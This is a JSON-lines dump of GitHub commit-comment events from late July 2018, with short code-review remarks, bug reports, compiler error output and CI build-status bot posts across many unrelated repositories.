{"id":"8035190429","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29878767,"position":10,"line":73,"path":"fireplace/cards/wog/paladin.py","commit_id":"8a85c4254057825124be4d89622eb476446ee757","created_at":"2018-07-30T02:45:13Z","updated_at":"2018-07-30T02:45:13Z","author_association":"NONE","body":"I havn't write real cases, but what if this happens?\r\n0 The current player has only 1 health, so he uses Forbidden Healing to heal the hero\r\n1 A Violet Teacher is triggered by OG_198 summoning a Violet Apprentice \r\n2 It triggers Knife Juggler and hit the enermy's Leper Gnome.\r\n"}},"created_at":"2018-07-30T02:45:13Z"}
{"id":"8035191018","type":"CommitCommentEvent","actor":{"login":"xxthgxx95"},"repo":{"name":"stonesam92/Translucent-Cydia"},"payload":{"comment":{"id":29878770,"position":1,"line":1,"path":"theos","commit_id":"f4c4d00b92e61df1c8b790d4faf16e53702ca9fe","created_at":"2018-07-30T02:45:28Z","updated_at":"2018-07-30T02:45:28Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-30T02:45:28Z"}
{"id":"8035191270","type":"CommitCommentEvent","actor":{"login":"rajjavaframework"},"repo":{"name":"agarwal-akash/Hospital-Management"},"payload":{"comment":{"id":29878772,"position":null,"line":null,"path":null,"commit_id":"e7bc4a3108d2edd189b45abe223abd8398829429","created_at":"2018-07-30T02:45:34Z","updated_at":"2018-07-30T02:45:34Z","author_association":"NONE","body":"showing EventDispatchThread exception"}},"created_at":"2018-07-30T02:45:34Z"}
{"id":"8035191958","type":"CommitCommentEvent","actor":{"login":"Croydon"},"repo":{"name":"inexorgame/audioaugust"},"payload":{"comment":{"id":29878774,"position":null,"line":null,"path":null,"commit_id":"b3fc92344593d4a0c5bbc1c1279e440379dc6ee9","created_at":"2018-07-30T02:45:50Z","updated_at":"2018-07-30T02:45:50Z","author_association":"MEMBER","body":"@IAmNotHanni https://github.com/inexorgame/audioaugust/commit/4f1022ec8d0704dd96a8933cf46424f2365af0ac#commitcomment-29807642"}},"created_at":"2018-07-30T02:45:50Z"}
{"id":"8035193079","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878777,"position":6,"line":6,"path":"group/assignment6/Space.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:46:18Z","updated_at":"2018-07-30T02:46:18Z","author_association":"COLLABORATOR","body":"Use Id"}},"created_at":"2018-07-30T02:46:18Z"}
{"id":"8035194005","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"arch4edu/arch4edu"},"payload":{"comment":{"id":29878781,"position":null,"line":null,"path":null,"commit_id":"f0b0dfff36ecf94141fed644fc58af477c4dc728","created_at":"2018-07-30T02:46:40Z","updated_at":"2018-07-30T02:46:40Z","author_association":"MEMBER","body":"现在就是跟随github的更新啊，这个是在nvchecker.ini中设置的\r\n这个地方的aur_pre_build表示build前会自动获取AUR上的PKGBUILD\r\nvcs_build就是只用本地的PKGBUILD，所以AUR上的改动收不到\r\n当时的情况是AUR上相关bug已经修了，但是这边还在用老的PKGBUILD，所以我就改aur_pre_build了\r\n\r\n现在这个包每天都会build，不过已经连续fail好几天了，邮件发给我了\r\n> 怎么强制指定收件人这个我正在发PR改lilac\r\n\r\n这次fail的bug我也不知道该怎么修，已经反馈给AUR了"}},"created_at":"2018-07-30T02:46:40Z"}
{"id":"8035195119","type":"CommitCommentEvent","actor":{"login":"vhaixiang"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":29878782,"position":null,"line":null,"path":null,"commit_id":"f0a47e1df0d620edb79ccf5b98d0fff122357cb0","created_at":"2018-07-30T02:47:09Z","updated_at":"2018-07-30T02:47:09Z","author_association":"COLLABORATOR","body":"更正，工单15458"}},"created_at":"2018-07-30T02:47:09Z"}
{"id":"8035196040","type":"CommitCommentEvent","actor":{"login":"jraddaoui"},"repo":{"name":"CCA-Public/dip-access-interface"},"payload":{"comment":{"id":29878785,"position":16,"line":149,"path":"accesspoc/accesspoc/settings.py","commit_id":"f8ad326bb9f9f2baa71fc4f5611ec48bd2ef9601","created_at":"2018-07-30T02:47:32Z","updated_at":"2018-07-30T02:47:32Z","author_association":"COLLABORATOR","body":"#75"}},"created_at":"2018-07-30T02:47:32Z"}
{"id":"8035197206","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878787,"position":7,"line":7,"path":"group/assignment6/Space.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:48:03Z","updated_at":"2018-07-30T02:48:03Z","author_association":"COLLABORATOR","body":"If there are only 2 states, then a boolean \"isEmpty\" should suffice. \r\nAnd if we will keep SpaceState class then it should be inside Space class."}},"created_at":"2018-07-30T02:48:03Z"}
{"id":"8035199775","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878799,"position":41,"line":41,"path":"group/assignment6/Space.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:49:13Z","updated_at":"2018-07-30T02:49:13Z","author_association":"COLLABORATOR","body":"Style - add brackets"}},"created_at":"2018-07-30T02:49:13Z"}
{"id":"8035200467","type":"CommitCommentEvent","actor":{"login":"luofuxian"},"repo":{"name":"luofuxian/ccssoft"},"payload":{"comment":{"id":29878801,"position":null,"line":null,"path":null,"commit_id":"965a74909d02967f7fd81c9cbf99c846df809beb","created_at":"2018-07-30T02:49:32Z","updated_at":"2018-07-30T02:49:32Z","author_association":"OWNER","body":"修改位置"}},"created_at":"2018-07-30T02:49:32Z"}
{"id":"8035201515","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878804,"position":6,"line":6,"path":"group/assignment6/Space.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:50:01Z","updated_at":"2018-07-30T02:50:01Z","author_association":"COLLABORATOR","body":"Also, I think that it should be an int or String."}},"created_at":"2018-07-30T02:50:01Z"}
{"id":"8035202604","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/now-deploy-badge"},"payload":{"comment":{"id":29878815,"position":null,"line":null,"path":null,"commit_id":"67622b95aff61ff8af25bd99c32d36a4e000ba37","created_at":"2018-07-30T02:50:27Z","updated_at":"2018-07-30T02:50:27Z","author_association":"NONE","body":"Oooh, yea .. it's actually because the \"summary/details\" tag. Just not hide them?"}},"created_at":"2018-07-30T02:50:27Z"}
{"id":"8035203050","type":"CommitCommentEvent","actor":{"login":"xxthgxx95"},"repo":{"name":"stonesam92/Translucent-Cydia"},"payload":{"comment":{"id":29878816,"position":null,"line":null,"path":null,"commit_id":"90b4589573551d5ddd827d2177213c9e099a2baf","created_at":"2018-07-30T02:50:38Z","updated_at":"2018-07-30T02:50:38Z","author_association":"NONE","body":"90b4589"}},"created_at":"2018-07-30T02:50:38Z"}
{"id":"8035203142","type":"CommitCommentEvent","actor":{"login":"Jeff612"},"repo":{"name":"Jeff612/test1"},"payload":{"comment":{"id":29878817,"position":null,"line":null,"path":null,"commit_id":"3f3c77321b502317abfa675a24f280cf66c0cbb7","created_at":"2018-07-30T02:50:41Z","updated_at":"2018-07-30T02:50:41Z","author_association":"OWNER","body":"hard to use"}},"created_at":"2018-07-30T02:50:41Z"}
{"id":"8035205232","type":"CommitCommentEvent","actor":{"login":"emukidid"},"repo":{"name":"emukidid/snes9xgx"},"payload":{"comment":{"id":29878819,"position":null,"line":null,"path":null,"commit_id":"a4177458176bfdf2881aebf3204c0a4fb5083640","created_at":"2018-07-30T02:51:31Z","updated_at":"2018-07-30T02:51:31Z","author_association":"OWNER","body":"Try it with what version of devkitPPC was \"latest\" at the time of my commit. I haven't tried with the absolute latest but perhaps it has broken again."}},"created_at":"2018-07-30T02:51:31Z"}
{"id":"8035207711","type":"CommitCommentEvent","actor":{"login":"Aznboylanz"},"repo":{"name":"Aznboylanz/Fr3sh"},"payload":{"comment":{"id":29878823,"position":null,"line":null,"path":null,"commit_id":"aa21725d1f841678ee945fcab9e9e46d4031333c","created_at":"2018-07-30T02:52:24Z","updated_at":"2018-07-30T02:52:24Z","author_association":"OWNER","body":"basket ball img\r\n"}},"created_at":"2018-07-30T02:52:24Z"}
{"id":"8035209566","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878827,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T02:53:14Z","updated_at":"2018-07-30T02:53:14Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2952 of 2952 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T02:53:14Z"}
{"id":"8035210139","type":"CommitCommentEvent","actor":{"login":"LucasAbner"},"repo":{"name":"ProjetoPM/PMST"},"payload":{"comment":{"id":29878832,"position":null,"line":null,"path":null,"commit_id":"05ca5a57f70597e7e873ac5d2d6f70f8c47a13a7","created_at":"2018-07-30T02:53:27Z","updated_at":"2018-07-30T02:53:27Z","author_association":"CONTRIBUTOR","body":"Não conseguir faazer commit no codigo"}},"created_at":"2018-07-30T02:53:27Z"}
{"id":"8035215978","type":"CommitCommentEvent","actor":{"login":"xxthgxx95"},"repo":{"name":"mehulrao/iOS-11-Frameworks"},"payload":{"comment":{"id":29878846,"position":null,"line":null,"path":null,"commit_id":"7117c0e9fb503fb58ffcb8d353fea97fab5e4645","created_at":"2018-07-30T02:55:45Z","updated_at":"2018-07-30T02:55:45Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-30T02:55:45Z"}
{"id":"8035216813","type":"CommitCommentEvent","actor":{"login":"xxthgxx95"},"repo":{"name":"mehulrao/iOS-11-Frameworks"},"payload":{"comment":{"id":29878850,"position":1,"line":1,"path":"README.md","commit_id":"7117c0e9fb503fb58ffcb8d353fea97fab5e4645","created_at":"2018-07-30T02:56:07Z","updated_at":"2018-07-30T02:56:07Z","author_association":"NONE","body":"7117c0e"}},"created_at":"2018-07-30T02:56:07Z"}
{"id":"8035219049","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878853,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T02:57:05Z","updated_at":"2018-07-30T02:57:05Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2952 of 2952 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T02:57:05Z"}
{"id":"8035220899","type":"CommitCommentEvent","actor":{"login":"bprail"},"repo":{"name":"bprail/contech"},"payload":{"comment":{"id":29878859,"position":null,"line":null,"path":null,"commit_id":"9f5c765abbe5adef5361e2d262fe0cd8bae8fce9","created_at":"2018-07-30T02:57:56Z","updated_at":"2018-07-30T02:57:56Z","author_association":"OWNER","body":"#190 "}},"created_at":"2018-07-30T02:57:56Z"}
{"id":"8035222565","type":"CommitCommentEvent","actor":{"login":"ndokos"},"repo":{"name":"parallel-fs-utils/fio"},"payload":{"comment":{"id":29878864,"position":null,"line":null,"path":null,"commit_id":"4b34a0ebcc434df76721c5f6fb68bed2229fba30","created_at":"2018-07-30T02:58:40Z","updated_at":"2018-07-30T02:58:40Z","author_association":"NONE","body":"LGTM."}},"created_at":"2018-07-30T02:58:40Z"}
{"id":"8035224750","type":"CommitCommentEvent","actor":{"login":"Wasseem81"},"repo":{"name":"patrikhuber/eos"},"payload":{"comment":{"id":29878865,"position":null,"line":null,"path":null,"commit_id":"9405338e29b7023d3495ed2cbbfb08904b2c6946","created_at":"2018-07-30T02:59:37Z","updated_at":"2018-07-30T02:59:37Z","author_association":"NONE","body":"Hi I got this error when building the project in Visual Studio 2015 in Windows 10. Could you please help?\r\n\r\n5>  generate-obj.cpp\r\n3>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/cpp17/optional.hpp(31): fatal error C1083: Cannot open include file: 'optional': No such file or directory\r\n2>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/cpp17/optional.hpp(31): fatal error C1083: Cannot open include file: 'optional': No such file or directory\r\n4>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/cpp17/optional.hpp(31): fatal error C1083: Cannot open include file: 'optional': No such file or directory\r\n5>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/render/detail/texturing.hpp(81): warning C4244: 'argument': conversion from 'int' to 'float', possible loss of data\r\n5>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/render/detail/texturing.hpp(81): warning C4244: 'initializing': conversion from 'float' to 'unsigned char', possible loss of data\r\n5>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/render/detail/texturing.hpp(81): warning C4244: 'initializing': conversion from 'float' to 'const unsigned char', possible loss of data\r\n5>C:\\Users\\WNI\\Desktop\\eos_cmake\\include\\eos/cpp17/optional.hpp(31): fatal error C1083: Cannot open include file: 'optional': No such file or directory\r\n7>------ Build started: Project: ALL_BUILD, Configuration: Debug x64 ------"}},"created_at":"2018-07-30T02:59:37Z"}
{"id":"8039959222","type":"CommitCommentEvent","actor":{"login":"poserbiker"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29892942,"position":13,"line":13,"path":"sql/updates/world/2018_07_30_01_world.sql","commit_id":"32299b2d496f2b6a5062658d777d6afc717fd8a1","created_at":"2018-07-30T20:00:31Z","updated_at":"2018-07-30T20:00:31Z","author_association":"MEMBER","body":"![bunny](https://user-images.githubusercontent.com/896742/43420438-84e7ca84-93f8-11e8-98bf-4756c6e6dded.gif)\r\n"}},"created_at":"2018-07-30T20:00:31Z"}
{"id":"8039962869","type":"CommitCommentEvent","actor":{"login":"FremyCompany"},"repo":{"name":"w3c/csswg-drafts"},"payload":{"comment":{"id":29892956,"position":22,"line":373,"path":"css-grid-2/Overview.bs","commit_id":"c2e0acf5da649d8e918954618c4a31418ee79508","created_at":"2018-07-30T20:01:12Z","updated_at":"2018-07-30T20:01:12Z","author_association":"CONTRIBUTOR","body":"Shouldn't we specify that each items that match this condition should generate a second item with the mbp? Implementations are of course free to optimize for common cases, but here is an example of what I'm thinking about:\r\n```\r\n5px auto auto 5px\r\n.   aaaaaaaaa .\r\n.   bbbb cccc .\r\n```\r\n```css\r\nsubgrid > a { width: 1000px; }\r\nsubgrid > b { width: 50px; }\r\nsubgrid > c { width: 50px; }\r\nsubgrid { padding: 25px }\r\n```\r\nIf I read your sentence correctly, the padding should be applied on the items for \"b\" ad \"c\" but the major contribution is each of both of these columns will be the spanner \"a\".\r\n\r\nThoughts?"}},"created_at":"2018-07-30T20:01:12Z"}
{"id":"8039963693","type":"CommitCommentEvent","actor":{"login":"sdh11"},"repo":{"name":"VTCubeSat/Flight-Software-New"},"payload":{"comment":{"id":29892958,"position":74,"line":40,"path":"CCS/Main_board_5994/components/interfaces/sdcard.c","commit_id":"8bd1a1a3e9c0a254d61854c646d224fc8fa5fc0d","created_at":"2018-07-30T20:01:23Z","updated_at":"2018-07-30T20:01:23Z","author_association":"CONTRIBUTOR","body":"*sizeof(&msg)* will not give you the length of the buffer. This gives the size of the memory location that is storing the pointer to the buffer. Use the length argument (uint16_t length) I mentioned earlier."}},"created_at":"2018-07-30T20:01:23Z"}
{"id":"8039966464","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892973,"position":143,"line":121,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T20:01:55Z","updated_at":"2018-07-30T20:01:55Z","author_association":"NONE","body":"упс... забыла убрать в интерфейс?"}},"created_at":"2018-07-30T20:01:55Z"}
{"id":"8039967136","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29892976,"position":null,"line":null,"path":null,"commit_id":"377785e6b9a5142ac8b4ad6e33c55862dad1c9c9","created_at":"2018-07-30T20:02:03Z","updated_at":"2018-07-30T20:02:03Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1703 of 1703 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.09%25-green.png)</a>\n"}},"created_at":"2018-07-30T20:02:03Z"}
{"id":"8039971635","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29892998,"position":4,"line":4,"path":".gitignore","commit_id":"698b47c6028d554f5ed6dbcd88cc3cadfe0cba39","created_at":"2018-07-30T20:02:59Z","updated_at":"2018-07-30T20:02:59Z","author_association":"NONE","body":"remove this line"}},"created_at":"2018-07-30T20:02:59Z"}
{"id":"8039973442","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29893001,"position":null,"line":null,"path":null,"commit_id":"0eb9cc58076bf471ee76d658fc48e86698ff264a","created_at":"2018-07-30T20:03:22Z","updated_at":"2018-07-30T20:03:22Z","author_association":"COLLABORATOR","body":"<h3>[Core] Button should render text if text={0} (#2727)</h3>\n\nPreview: <strong><a href='https://19188-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19188-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19188-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-30T20:03:22Z"}
{"id":"8039973989","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29893002,"position":null,"line":null,"path":null,"commit_id":"e0d1d6ce9c5218edb8af1337758c1e41d9749afd","created_at":"2018-07-30T20:03:28Z","updated_at":"2018-07-30T20:03:28Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/e0d1d6ce9c5218edb8af1337758c1e41d9749afd/index.html"}},"created_at":"2018-07-30T20:03:28Z"}
{"id":"8039974696","type":"CommitCommentEvent","actor":{"login":"simonh1000"},"repo":{"name":"simonh1000/angular-http-server"},"payload":{"comment":{"id":29893006,"position":null,"line":null,"path":null,"commit_id":"a61b0c9f0186c02de290873cbf14515bbd5d3422","created_at":"2018-07-30T20:03:37Z","updated_at":"2018-07-30T20:03:37Z","author_association":"OWNER","body":"Thanks, looks interesting. Give me a few days to review this as I'm travelling at present"}},"created_at":"2018-07-30T20:03:37Z"}
{"id":"8039974778","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexorgame/audioaugust"},"payload":{"comment":{"id":29893008,"position":null,"line":null,"path":null,"commit_id":"3a3791205e3cc0f95bbeb81ad9044b170e092df5","created_at":"2018-07-30T20:03:38Z","updated_at":"2018-07-30T20:03:38Z","author_association":"MEMBER","body":"Oh I did it again! I will change this."}},"created_at":"2018-07-30T20:03:38Z"}
{"id":"8039975949","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893012,"position":5,"line":5,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/train.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:03:52Z","updated_at":"2018-07-30T20:03:52Z","author_association":"NONE","body":"Не реализован пункт ТЗ\r\n\r\nнаписать метод, который принимает блок и проходит по всем вагонам поезда (вагоны должны быть во внутреннем массиве), передавая каждый объект вагона в блок.\r\n\r\nПричем этот метод используется в интерфэйсе, но он не определен."}},"created_at":"2018-07-30T20:03:52Z"}
{"id":"8039976400","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexorgame/audioaugust"},"payload":{"comment":{"id":29893016,"position":null,"line":null,"path":null,"commit_id":"4f1022ec8d0704dd96a8933cf46424f2365af0ac","created_at":"2018-07-30T20:03:58Z","updated_at":"2018-07-30T20:03:58Z","author_association":"MEMBER","body":"Audio information like \"album\", \"creator\" and more.."}},"created_at":"2018-07-30T20:03:58Z"}
{"id":"8039977553","type":"CommitCommentEvent","actor":{"login":"sdh11"},"repo":{"name":"VTCubeSat/Flight-Software-New"},"payload":{"comment":{"id":29893023,"position":53,"line":45,"path":"CCS/Main_board_5994/components/interfaces/sdcard.h","commit_id":"8bd1a1a3e9c0a254d61854c646d224fc8fa5fc0d","created_at":"2018-07-30T20:04:12Z","updated_at":"2018-07-30T20:04:12Z","author_association":"CONTRIBUTOR","body":"I'd add a *length* member for *sd_card_msg*."}},"created_at":"2018-07-30T20:04:12Z"}
{"id":"8039979516","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29893033,"position":5,"line":4,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T20:04:36Z","updated_at":"2018-07-30T20:04:36Z","author_association":"NONE","body":"строки 9 и 10 вполне можно в \"инишиалайз\""}},"created_at":"2018-07-30T20:04:36Z"}
{"id":"8039981312","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893037,"position":39,"line":39,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/station.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:04:59Z","updated_at":"2018-07-30T20:04:59Z","author_association":"NONE","body":"А чем тут будет являться x?"}},"created_at":"2018-07-30T20:04:59Z"}
{"id":"8039989319","type":"CommitCommentEvent","actor":{"login":"jlengrand"},"repo":{"name":"jlengrand/elm-dungeon"},"payload":{"comment":{"id":29893056,"position":null,"line":null,"path":null,"commit_id":"8bc065a539570381bbb4c605f76deff1dc8488bc","created_at":"2018-07-30T20:06:34Z","updated_at":"2018-07-30T20:06:34Z","author_association":"OWNER","body":"Thanks, I fixed it reading only your first comment . Happy to see that my implementation is the same as your second comment :D"}},"created_at":"2018-07-30T20:06:34Z"}
{"id":"8039989618","type":"CommitCommentEvent","actor":{"login":"sme007"},"repo":{"name":"sme007/lci.github.io"},"payload":{"comment":{"id":29893058,"position":null,"line":null,"path":null,"commit_id":"bc7da5f272806bf39107d3371a5e284f6fd009a9","created_at":"2018-07-30T20:06:38Z","updated_at":"2018-07-30T20:06:38Z","author_association":"OWNER","body":"my first site"}},"created_at":"2018-07-30T20:06:38Z"}
{"id":"8039990391","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893061,"position":10,"line":10,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:06:47Z","updated_at":"2018-07-30T20:06:47Z","author_association":"NONE","body":"Тут тоже следует переименовать general в volume"}},"created_at":"2018-07-30T20:06:47Z"}
{"id":"8039991551","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29893062,"position":13,"line":13,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T20:07:00Z","updated_at":"2018-07-30T20:07:00Z","author_association":"NONE","body":"и соответственно тут"}},"created_at":"2018-07-30T20:07:00Z"}
{"id":"8039991796","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29893063,"position":null,"line":null,"path":null,"commit_id":"d9db1f5a4006891c3d8ec11ecf56c94136f4f758","created_at":"2018-07-30T20:07:03Z","updated_at":"2018-07-30T20:07:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-460](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-460).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-460-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T20:07:03Z"}
{"id":"8039994839","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29893066,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-30T20:07:40Z","updated_at":"2018-07-30T20:07:40Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T20:07:40Z"}
{"id":"8039997229","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29893075,"position":null,"line":null,"path":null,"commit_id":"2ab96bf9a9bf1c972aa340d704b9aaacb098ffee","created_at":"2018-07-30T20:08:11Z","updated_at":"2018-07-30T20:08:11Z","author_association":"CONTRIBUTOR","body":"Not working on my end???"}},"created_at":"2018-07-30T20:08:11Z"}
{"id":"8040004302","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29893088,"position":20,"line":10723,"path":"src/game/Entities/Unit.cpp","commit_id":"f61fb6689de37165505cb3ee178ec090b016f8c4","created_at":"2018-07-30T20:09:37Z","updated_at":"2018-07-30T20:09:37Z","author_association":"CONTRIBUTOR","body":"I agree that there is a threat management done server side for charmed units and this is different whenever the unit is a player or a creature though we do not know for sure to which extend.\r\n\r\nEspecially the way threat is generated for NPC while it is charmed, how it interacts with threat from before being charmed and how both are merged once NPC is released (if merged at all).\r\n\r\nAnyway, I understand you took the opportunity to remove that part of the code while improving CombatStartPosition. We need to keep that in mind when working later on charmed unit to remember the real reason of this change.\r\n\r\nThanks for clarifying. "}},"created_at":"2018-07-30T20:09:37Z"}
{"id":"8040007004","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29893090,"position":109,"line":93,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T20:10:12Z","updated_at":"2018-07-30T20:10:12Z","author_association":"NONE","body":"That's not the 2 I was thinking about:\r\n\r\n1- Call `joinGame` with a `gameId` that is at or above `nextGameId`. What do you think would happen?\r\n2- Can't remember now -.-\r\n\r\nTo protect against your wrong move, you can enforce that at reveal: no valid reveal is a loss."}},"created_at":"2018-07-30T20:10:12Z"}
